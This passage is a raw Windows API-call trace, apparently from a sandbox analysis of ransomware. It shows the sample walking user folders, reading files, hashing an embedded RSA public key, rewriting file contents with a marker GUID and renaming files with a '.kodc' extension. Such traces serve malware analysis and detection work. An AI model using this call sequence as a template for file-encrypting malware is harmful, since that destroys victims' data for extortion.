hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0101.700] WriteFile (in: hFile=0x5cc, lpBuffer=0x65e7c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x65e7c0*, lpNumberOfBytesWritten=0x9e2fb14*=0x80, lpOverlapped=0x0) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0101.700] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.701] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0101.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0101.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0101.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0101.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0101.701] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0101.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.701] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.701] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.701] CloseHandle (hObject=0x5cc) returned 1 [0101.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x32c9230 [0101.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x32d0db8 [0101.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c9230 | out: hHeap=0x630000) returned 1 [0101.702] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.kodc")) returned 1 [0101.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0101.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.703] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.704] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0101.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0101.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.704] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned=".url" [0101.704] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.707] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=133) returned 1 [0101.707] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.709] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.710] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.710] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.711] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x85, lpOverlapped=0x0) returned 1 [0101.711] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.711] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.711] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.711] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.712] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.712] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.712] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.712] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.712] GetLastError () returned 0x0 [0101.712] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.712] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.712] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.712] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.712] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.712] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6238 [0101.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80b8 [0101.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6280 [0101.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80d0 [0101.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8100 [0101.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.713] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.713] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.713] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.713] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.713] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.714] CloseHandle (hObject=0x5cc) returned 1 [0101.715] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.kodc")) returned 1 [0101.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0101.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.715] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.716] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0101.716] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0101.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0101.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332dc90 | out: hHeap=0x630000) returned 1 [0101.717] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0101.717] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0101.717] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\") returned="jnsPq9bVvOwQR\\" [0101.717] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0101.717] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0101.717] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0101.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.717] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0101.717] PathFindFileNameW (pszPath="") returned="" [0101.717] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad578d80, ftCreationTime.dwHighDateTime=0x1d5bb7d, ftLastAccessTime.dwLowDateTime=0x18cfc610, ftLastAccessTime.dwHighDateTime=0x1d5bbcc, ftLastWriteTime.dwLowDateTime=0x18cfc610, ftLastWriteTime.dwHighDateTime=0x1d5bbcc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0101.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.717] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad578d80, ftCreationTime.dwHighDateTime=0x1d5bb7d, ftLastAccessTime.dwLowDateTime=0x18cfc610, ftLastAccessTime.dwHighDateTime=0x1d5bbcc, ftLastWriteTime.dwLowDateTime=0x18cfc610, ftLastWriteTime.dwHighDateTime=0x1d5bbcc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.717] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6f13da0, ftCreationTime.dwHighDateTime=0x1d5b67e, ftLastAccessTime.dwLowDateTime=0x5cd81430, ftLastAccessTime.dwHighDateTime=0x1d5b59f, ftLastWriteTime.dwLowDateTime=0x5cd81430, ftLastWriteTime.dwHighDateTime=0x1d5b59f, nFileSizeHigh=0x0, nFileSizeLow=0x775c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5YAPOd5GhH.mp3", cAlternateFileName="5YAPOD~1.MP3")) returned 1 [0101.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0101.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.718] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\5YAPOd5GhH.mp3") returned=".mp3" [0101.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\5YAPOd5GhH.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\5yapod5ghh.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.718] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=30556) returned 1 [0101.718] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.721] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7736, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.721] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.722] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.722] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x775c, lpOverlapped=0x0) returned 1 [0101.722] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.722] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.722] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.722] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.723] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.723] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.723] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.723] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.723] GetLastError () returned 0x0 [0101.723] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.723] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.723] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.723] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.724] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7760) returned 0x9ba8d90 [0101.724] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6280 [0101.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80d0 [0101.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb62c8 [0101.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80e8 [0101.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8118 [0101.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 